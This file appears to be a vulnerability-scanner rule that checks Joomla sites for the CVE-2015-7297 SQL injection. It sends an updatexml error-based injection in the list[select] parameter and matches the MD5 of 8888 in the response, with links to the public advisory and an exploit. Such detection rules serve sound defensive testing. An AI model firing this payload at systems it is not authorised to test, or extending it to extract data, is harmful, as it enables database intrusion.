name: poc-yaml-joomla-cve-2015-7297-sqli
rules:
  - method: GET
    path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
    expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
detail:
  links:
    - https://www.exploit-db.com/exploits/38797
    - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
    - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/